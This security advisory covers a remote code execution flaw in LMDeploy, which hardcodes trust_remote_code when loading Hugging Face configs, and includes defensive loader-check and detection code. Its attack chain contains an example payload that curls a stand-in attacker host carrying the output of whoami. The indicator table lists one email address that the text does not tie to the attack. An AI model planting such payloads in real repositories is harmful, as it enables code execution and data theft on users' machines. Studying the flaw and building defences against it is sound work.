LMDeploy Hardcoded trust_remote_code Enables Remote Code Execution (CVE-2026-46517)
LMDeploy <= 0.12.3 is vulnerable to remote code execution (CVE-2026-46517) because it hardcodes `trust_remote_code=True` when calling `transformers.AutoConfig.from_pretrained()`, so a malicious Hugging Face repository can execute arbitrary Python code as soon as it is loaded, with no way for the user to opt out.
LMDeploy, a toolkit for large model deployment, hardcodes `trust_remote_code=True` in its `transformers.AutoConfig.from_pretrained()` calls. This overrides the default-secure stance of Hugging Face Transformers (≥ 4.30), in which code shipped inside a model repository is not imported unless the caller explicitly opts in, and allows arbitrary Python code execution when a user loads a model from a malicious Hugging Face repository. The issue affects users running `lmdeploy serve api_server`, `lmdeploy lite calibrate`, or related commands against untrusted repositories. Because the parameter is hardcoded, the user has no control over it. The vulnerability is tracked as CVE-2026-46517 and affects lmdeploy <= 0.12.3.
Attack Chain
- Attacker creates a malicious Hugging Face repository containing a `config.json` file with an `auto_map` key pointing to a custom `configuration_evil.py` file.
- The `configuration_evil.py` file contains malicious Python code, such as `os.system("curl https://attacker/?$(whoami)")`, designed to execute when imported.
- A user, following a tutorial or benchmarking models, runs an lmdeploy command such as `lmdeploy serve api_server <attacker_repo>` or `lmdeploy lite calibrate <attacker_repo>`.
- LMDeploy calls `transformers.AutoConfig.from_pretrained(model_path, trust_remote_code=True)` due to the hardcoded `trust_remote_code=True` in `lmdeploy/archs.py`, `lmdeploy/lite/apis/calibrate.py`, and `lmdeploy/lite/utils/load.py`.
- Hugging Face Transformers downloads the `configuration_evil.py` file from the malicious repository.
- Hugging Face Transformers imports the `configuration_evil.py` module, causing the malicious Python code to execute.
- The attacker gains code execution on the user's machine with the privileges of the lmdeploy process.
- The attacker can then perform actions such as stealing credentials, installing malware, or compromising the system.
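The check a patched loader would perform before the `from_pretrained` call in the chain above, as an added example that is not LMDeploy's or Transformers' code: parse the repository's `config.json`, list every `auto_map` entry that would cause a Python module to be downloaded and imported, and refuse to continue unless the caller explicitly passed `trust_remote_code=True`. The function and class names are hypothetical and both sample configs are constructed; the `auto_map` value formats handled (`module.Class`, `org/repo--module.Class`, and a `[slow, fast]` tokenizer pair) are the ones Transformers accepts.

```python
"""Pre-load check for a Hugging Face model repository: list the `auto_map`
entries in config.json that would make Transformers download and import
Python from the repository, and refuse to continue unless the caller opted
in.  Added example; this is not LMDeploy or Transformers code.  The function
and class names are hypothetical, and the sample configs are constructed."""
import json
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class RemoteCodeRef:
    auto_class: str         # auto class being redirected, e.g. "AutoConfig"
    repo: Optional[str]     # other repo the code is pulled from, or None for this repo
    module_file: str        # Python file inside that repo, e.g. "configuration_evil.py"
    class_name: str         # class inside that module


def find_remote_code(config: Dict) -> List[RemoteCodeRef]:
    """Return every class reference in `auto_map`, the mechanism Transformers
    uses to resolve custom architectures.  Values are "module.Class" or
    "org/repo--module.Class" (code hosted in a different repository); tokenizer
    entries may be a [slow, fast] pair with None for a missing variant."""
    refs: List[RemoteCodeRef] = []
    for auto_class, target in (config.get("auto_map") or {}).items():
        targets = target if isinstance(target, (list, tuple)) else [target]
        for t in targets:
            if not t:
                continue
            repo, _, module_cls = t.rpartition("--")
            module, _, cls = module_cls.rpartition(".")
            refs.append(RemoteCodeRef(auto_class, repo or None, module + ".py", cls))
    return refs


class RemoteCodeRefused(PermissionError):
    """Raised when a repository needs custom code and the caller did not opt in."""


def load_config_guarded(config_text: str, trust_remote_code: bool = False) -> Dict:
    """Parse config.json and return it only if it is safe to hand to
    AutoConfig.from_pretrained with the same `trust_remote_code` value.
    Defaulting to False restores the Transformers default that LMDeploy
    <= 0.12.3 overrode; a patched CLI would wire this to --trust-remote-code."""
    config = json.loads(config_text)
    refs = find_remote_code(config)
    if refs and not trust_remote_code:
        listing = ", ".join(f"{r.auto_class} -> {r.module_file}:{r.class_name}" for r in refs)
        raise RemoteCodeRefused(
            f"repository ships custom code that would be imported on load ({listing}); "
            "pass trust_remote_code=True only for a repository you have vetted")
    return config


# Constructed config.json of the kind the attacker's repository would carry:
# the file and class names follow the attack chain above; nothing here comes
# from a real repository.
MALICIOUS_CONFIG = json.dumps({
    "model_type": "llama",
    "architectures": ["EvilForCausalLM"],
    "auto_map": {
        "AutoConfig": "configuration_evil.EvilConfig",
        "AutoModelForCausalLM": "modeling_evil.EvilForCausalLM",
    },
})

# Constructed config.json of an ordinary repository: no auto_map, so loading
# it never imports repository code.
BENIGN_CONFIG = json.dumps({"model_type": "llama", "architectures": ["LlamaForCausalLM"]})


if __name__ == "__main__":
    print("benign:", load_config_guarded(BENIGN_CONFIG)["model_type"])
    try:
        load_config_guarded(MALICIOUS_CONFIG)   # refused: the default is opt-in
    except RemoteCodeRefused as exc:
        print("refused:", exc)
    # Opted in explicitly, the config (and later the code) would be loaded;
    # the equivalent Transformers call is
    #   AutoConfig.from_pretrained(model_path, trust_remote_code=True)
    print("opt-in:", load_config_guarded(MALICIOUS_CONFIG, trust_remote_code=True)["auto_map"])
```

The guard only inspects the file Transformers would act on; it does not replace passing the flag through. The point of the example is that a loader which keeps `trust_remote_code` at its default of False, and surfaces the `auto_map` targets when it refuses, turns the silent import in the chain above into a decision the operator has to make per repository.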
Impact
Successful exploitation allows an attacker to execute arbitrary code on the victim's machine. The impact includes potential data theft, system compromise, and further propagation of the attack. This vulnerability affects any user of LMDeploy who loads models from untrusted sources, impacting casual users, CI pipelines, and researchers. The vulnerability exists because LMDeploy overrides Hugging Face's default-secure stance without providing any warning or opt-out mechanism to the user.
Recommendation
- Upgrade to a patched version of LMDeploy that includes a `--trust-remote-code` CLI flag defaulting to False, as described in the Suggested fix section.
- Deploy the Sigma rule `Detect LMDeploy Remote Code Execution via Configuration File Import` to detect potential exploitation attempts by monitoring process creation events related to Python and file paths from the Hugging Face cache.
- Exercise extreme caution when loading models from untrusted Hugging Face repositories with LMDeploy, and avoid running LMDeploy commands against repositories that have not been thoroughly vetted.
- Monitor network connections initiated by Python processes originating from the Hugging Face Transformers cache directory, using a network connection monitoring rule.
Detection coverage (2 rules)
- Detect LMDeploy Remote Code Execution via Configuration File Import (medium): Detects CVE-2026-46517 exploitation by monitoring process creation events where Python imports a configuration file from a Hugging Face Transformers cache, indicating potential remote code execution via a malicious model repository.
- Detect Network Connections from Hugging Face Cache (low): Detects network connections initiated by Python processes originating from the Hugging Face Transformers cache directory, potentially indicating remote code execution.
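Detection logic for the two signals those rules describe, run over constructed telemetry, as an added example: this is not the platform's Sigma rules, and the exact matching logic is an assumption. Events are Sysmon-style dicts (EventID 11 file create, EventID 3 network connect), the hostnames and paths are invented, and the cache path relies on Transformers copying remote-code files into `HF_MODULES_CACHE` (by default `~/.cache/huggingface/modules/transformers_modules/<repo>/`) before importing them. The medium rule fires when a python process writes a `.py` file into that cache; the low rule correlates a later outbound connection from the same pid and allowlists the hub itself, since the same process legitimately downloads weights from it.

```python
"""Detection logic for the two signals described above, run over constructed
telemetry.  Added example; it is not the platform's Sigma rules and the exact
rule logic is an assumption.  Events are Sysmon-style dicts (EventID 11 file
create, EventID 3 network connect).  The cache path relies on Transformers
copying remote-code files into HF_MODULES_CACHE (by default
~/.cache/huggingface/modules/transformers_modules/<repo>/) before importing them."""
import posixpath
from typing import Dict, Iterable, List, Optional, Tuple

CACHE_MARKER = "/huggingface/modules/transformers_modules/"


def is_python(image: str) -> bool:
    """True for /usr/bin/python3, /opt/venv/bin/python3.11, and the like."""
    return posixpath.basename(image).startswith("python")


def module_path_info(path: str) -> Optional[Tuple[str, str]]:
    """If `path` is a .py file below the dynamic-module cache, return
    (repo folder, file name); otherwise None.  Hub blobs such as config.json
    under ~/.cache/huggingface/hub/ do not match."""
    idx = path.find(CACHE_MARKER)
    if idx < 0 or not path.endswith(".py"):
        return None
    rel = path[idx + len(CACHE_MARKER):]       # "evil-org/evil-model/configuration_evil.py"
    return posixpath.dirname(rel), posixpath.basename(rel)


def rule_remote_code_import(events: Iterable[Dict]) -> List[Dict]:
    """Medium severity: a python process writes a Python module into the
    Transformers dynamic-module cache, i.e. repository code is about to be
    imported.  Each hit records which repository the code came from."""
    hits = []
    for e in events:
        if e.get("EventID") != 11 or not is_python(e.get("Image", "")):
            continue
        info = module_path_info(e.get("TargetFilename", ""))
        if info is not None:
            hits.append({"severity": "medium", "pid": e["pid"], "ts": e["ts"],
                         "repo": info[0], "file": info[1]})
    return hits


def rule_cache_network(events: Iterable[Dict], window: int = 300,
                       known_hosts: Tuple[str, ...] = ("huggingface.co",)) -> List[Dict]:
    """Low severity: a network connection by a python process shortly after
    repository code was copied into its cache.  The hub is allowlisted because
    the same process legitimately downloads weights from it; a beacon like
    curl https://attacker/?$(whoami) goes somewhere else."""
    events = list(events)
    first_module: Dict[int, int] = {}
    for h in rule_remote_code_import(events):
        first_module[h["pid"]] = min(first_module.get(h["pid"], h["ts"]), h["ts"])
    hits = []
    for e in events:
        if e.get("EventID") != 3 or not is_python(e.get("Image", "")):
            continue
        t0 = first_module.get(e["pid"])
        host = e.get("DestinationHostname", "")
        if t0 is None or not (t0 <= e["ts"] <= t0 + window) or host in known_hosts:
            continue
        hits.append({"severity": "low", "pid": e["pid"], "ts": e["ts"],
                     "host": host, "port": e.get("DestinationPort")})
    return hits


# Constructed telemetry for one lmdeploy run against a malicious repository
# (pid 4242) plus two unrelated python processes; hostnames and paths are invented.
EVENTS = [
    {"ts": 100, "EventID": 1, "pid": 4242, "Image": "/usr/bin/python3",
     "CommandLine": "python3 -m lmdeploy serve api_server evil-org/evil-model"},
    {"ts": 101, "EventID": 3, "pid": 4242, "Image": "/usr/bin/python3",
     "DestinationHostname": "huggingface.co", "DestinationPort": 443},          # fetching config.json
    {"ts": 102, "EventID": 11, "pid": 4242, "Image": "/usr/bin/python3",
     "TargetFilename": "/home/dev/.cache/huggingface/modules/transformers_modules/evil-org/evil-model/configuration_evil.py"},
    {"ts": 103, "EventID": 3, "pid": 4242, "Image": "/usr/bin/python3",
     "DestinationHostname": "attacker.example", "DestinationPort": 443},        # payload beacon on import
    {"ts": 104, "EventID": 3, "pid": 4242, "Image": "/usr/bin/python3",
     "DestinationHostname": "huggingface.co", "DestinationPort": 443},          # weight download, allowlisted
    {"ts": 200, "EventID": 11, "pid": 5151, "Image": "/usr/bin/python3",
     "TargetFilename": "/home/dev/.cache/huggingface/hub/models--org--model/snapshots/abc/config.json"},
    {"ts": 300, "EventID": 3, "pid": 6161, "Image": "/usr/bin/python3",
     "DestinationHostname": "pypi.org", "DestinationPort": 443},                # unrelated python process
]

if __name__ == "__main__":
    for hit in rule_remote_code_import(EVENTS) + rule_cache_network(EVENTS):
        print(hit)
```

The medium rule is the one to alert on: a module landing in `transformers_modules` is exactly the step at which repository code is about to run, and the repository name in the path tells the responder what was loaded. The network rule stays low because any model that legitimately ships custom code produces the same cache write, and the process then talks to the hub anyway; without the allowlist the hub download at ts 104 would also fire.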
Indicators of compromise
| Type | Value |
|---|---|
| Email | sactransport2000@gmail.com |